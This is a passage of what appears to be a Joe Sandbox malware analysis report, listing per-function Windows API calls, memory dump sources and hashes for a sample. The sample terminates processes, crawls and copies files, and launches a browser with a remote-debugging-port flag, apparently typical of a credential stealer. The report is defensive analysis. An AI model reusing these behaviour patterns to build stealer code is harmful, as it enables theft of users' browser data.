                                • Part of subcall function 007D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007D46B9
                                • Part of subcall function 007D46A0: Process32First.KERNEL32(00000000,00000128), ref: 007D46C9
                                • Part of subcall function 007D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007D46DB
                                • Part of subcall function 007D46A0: StrCmpCA.SHLWAPI(?,?), ref: 007D46ED
                                • Part of subcall function 007D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D4702
                                • Part of subcall function 007D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4711
                                • Part of subcall function 007D46A0: CloseHandle.KERNEL32(00000000), ref: 007D4718
                                • Part of subcall function 007D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007D4726
                                • Part of subcall function 007D46A0: CloseHandle.KERNEL32(00000000), ref: 007D4731
                              • memset.MSVCRT ref: 007B9862
                              • lstrcat.KERNEL32(00000000,?), ref: 007B9878
                              • lstrcat.KERNEL32(00000000,?), ref: 007B9889
                              • lstrcat.KERNEL32(00000000,007E4B60), ref: 007B989B
                              • memset.MSVCRT ref: 007B98AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007B98D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B9903
                              • StrStrA.SHLWAPI(00000000,0145DCF0), ref: 007B9919
                              • lstrcpyn.KERNEL32(009E93D0,00000000,00000000), ref: 007B9938
                              • lstrlen.KERNEL32(?), ref: 007B994B
                              • wsprintfA.USER32 ref: 007B995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 007B9971
                              • memset.MSVCRT ref: 007B9986
                              • Sleep.KERNEL32(00001388), ref: 007B99E7
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B92E1
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B92FA
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B9399
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B93E6
                                • Part of subcall function 007D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007D4759
                                • Part of subcall function 007D4740: Process32First.KERNEL32(00000000,00000128), ref: 007D4769
                                • Part of subcall function 007D4740: Process32Next.KERNEL32(00000000,00000128), ref: 007D477B
                                • Part of subcall function 007D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D479C
                                • Part of subcall function 007D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007D47AB
                                • Part of subcall function 007D4740: CloseHandle.KERNEL32(00000000), ref: 007D47B2
                                • Part of subcall function 007D4740: Process32Next.KERNEL32(00000000,00000128), ref: 007D47C0
                                • Part of subcall function 007D4740: CloseHandle.KERNEL32(00000000), ref: 007D47CB
                              • CloseDesktop.USER32(?), ref: 007B9A1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 2040986984-1862457068
                              • Opcode ID: 34c3bdf226e8efe75253659c60133b6d4e4c82f8ba2869bf43939d19de0b4f38
                              • Instruction ID: c9b8c2b7b8e4dbb9a4cb1c38b6b6b0e9d8a39ba4e1ac16e70127f5450dd477c4
                              • Opcode Fuzzy Hash: 34c3bdf226e8efe75253659c60133b6d4e4c82f8ba2869bf43939d19de0b4f38
                              • Instruction Fuzzy Hash: D9917571914248EFDB50DFA4DC89FDE77B8AF48700F508595F609AB281DB74AE44CBA0
                              Function 007C1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C12BF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12E7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C133A
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C135C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1376
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C13E2
                              • lstrlen.KERNEL32(007E1794), ref: 007C13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C140A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1416
                              • lstrlen.KERNEL32(?), ref: 007C1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1443
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C147A
                              • StrCmpCA.SHLWAPI(?,0145CFE0), ref: 007C14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1535
                              • StrCmpCA.SHLWAPI(?,0145D0E0), ref: 007C1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C15E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C181C
                              • FindClose.KERNEL32(00000000), ref: 007C182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 19da8708bf9c45260d1409405ac2c37c16ae18c75749a6f43d8b124efa5bed20
                              • Instruction ID: bbeb6a7204c6ff81230fa426b8deec037a5607b838ebf69e0b0679af6ab20584
                              • Opcode Fuzzy Hash: 19da8708bf9c45260d1409405ac2c37c16ae18c75749a6f43d8b124efa5bed20
                              • Instruction Fuzzy Hash: FAC17E71A152469BDB21EF74DC89BEE77B8AF45300F84453CF84AA7252DB38DD068B90
                              Function 007CE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007CE22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CE243
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CE263
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CE27D
                              • wsprintfA.USER32 ref: 007CE2A2
                              • StrCmpCA.SHLWAPI(?,007DCFEC), ref: 007CE2B4
                              • wsprintfA.USER32 ref: 007CE2D1
                                • Part of subcall function 007CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007CEE12
                              • wsprintfA.USER32 ref: 007CE2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 007CE304
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CE335
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CE347
                              • lstrcat.KERNEL32(?,?), ref: 007CE358
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CE36A
                              • lstrcat.KERNEL32(?,?), ref: 007CE37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CE394
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE422
                              • DeleteFileA.KERNEL32(?), ref: 007CE45C
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CE49B
                              • FindClose.KERNEL32(00000000), ref: 007CE4AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: 4f2bb0cc26bfbb8363a4ab2859a39dc6c225ee664d9025f700fc9e7bdf32af5f
                              • Instruction ID: deecbae9b1af991dfecbff67efa8daa5bd21063df6bf624cee927a491a381ef6
                              • Opcode Fuzzy Hash: 4f2bb0cc26bfbb8363a4ab2859a39dc6c225ee664d9025f700fc9e7bdf32af5f
                              • Instruction Fuzzy Hash: 998162719142589BCB24EFA4DC89FEF7779BF48300F448998B90AA7141DB38AE45CF90
                              Function 007B16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B176C
                              • lstrcat.KERNEL32(00000000), ref: 007B1776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B18F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B18FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: c7170575964703248c791860b16cc70c790e09f754d9f39566077d97c4a9e185
                              • Instruction ID: 60e0b65484cf2a4f51112bce2c518468acb9397e96b1d7ad677c4d0de614f2b7
                              • Opcode Fuzzy Hash: c7170575964703248c791860b16cc70c790e09f754d9f39566077d97c4a9e185
                              • Instruction Fuzzy Hash: E4816431916296DBCB21EF68D899BEE77B5AF44701F844124F805BB252DB38AD02CB91
                              Function 007CDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007CDD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007CDD4C
                              • wsprintfA.USER32 ref: 007CDD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CDD79
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CDD9C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CDDB6
                              • wsprintfA.USER32 ref: 007CDDD4
                              • DeleteFileA.KERNEL32(?), ref: 007CDE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CDDED
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                                • Part of subcall function 007CD980: memset.MSVCRT ref: 007CD9A1
                                • Part of subcall function 007CD980: memset.MSVCRT ref: 007CD9B3
                                • Part of subcall function 007CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CD9DB
                                • Part of subcall function 007CD980: lstrcpy.KERNEL32(00000000,?), ref: 007CDA0E
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,00000000), ref: 007CDA1C
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,0145DEB8), ref: 007CDA36
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,?), ref: 007CDA4A
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,0145CED8), ref: 007CDA5E
                                • Part of subcall function 007CD980: lstrcpy.KERNEL32(00000000,?), ref: 007CDA8E
                                • Part of subcall function 007CD980: GetFileAttributesA.KERNEL32(00000000), ref: 007CDA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CDE2E
                              • FindClose.KERNEL32(00000000), ref: 007CDE3D
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CDE66
                              • lstrcat.KERNEL32(?,0145D460), ref: 007CDE7A
                              • lstrlen.KERNEL32(?), ref: 007CDE84
                              • lstrlen.KERNEL32(?), ref: 007CDE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDED2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 43437ebab1a3afd92586bea723eb2b16b674ad71398e1792417a8752c1091628
                              • Instruction ID: 2425080a8876ba4d72cbafe6cd725f3c6c58597cb06a9f018c7245c254258882
                              • Opcode Fuzzy Hash: 43437ebab1a3afd92586bea723eb2b16b674ad71398e1792417a8752c1091628
                              • Instruction Fuzzy Hash: 70616671914248EBCB20EFB4DC89BDE7779BF48301F4445A8F909A7251DB38AE45DB90
                              Function 007CD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007CD54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CD564
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CD584
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CD59E
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CD5E3
                              • lstrcat.KERNEL32(?,0145E3A0), ref: 007CD5F7
                              • lstrcat.KERNEL32(?,?), ref: 007CD60B
                              • lstrcat.KERNEL32(?,?), ref: 007CD61C
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CD62E
                              • lstrcat.KERNEL32(?,?), ref: 007CD642
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CD682
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CD6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CD737
                              • FindClose.KERNEL32(00000000), ref: 007CD746
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 4becb0839d97b5dcdb6be27cc6dd2812253e0fa54fe931c1e72ffa846c4b8e66
                              • Instruction ID: 9e1c850966c402ca87d244dd1b4a715f1d2148713c68c9253cb4eaf971fd6ec2
                              • Opcode Fuzzy Hash: 4becb0839d97b5dcdb6be27cc6dd2812253e0fa54fe931c1e72ffa846c4b8e66
                              • Instruction Fuzzy Hash: 4B618671910159DBCB20EFB4DC89BDE77B8EF48301F4084A9E949A7241DB38AE45CF90
                              Function 00B71D1B Relevance: 16.6, Strings: 12, Instructions: 1621COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "V6_$,?x$6xiO$<ZV$=?-$@{O$@{O$WH3I$pv$v:$z3^$-
                              • API String ID: 0-1857782857
                              • Opcode ID: 0f280d82f11f32d44a9c480b6b1e0195ff1d6ba91776f23dc1222a36fdf11dd3
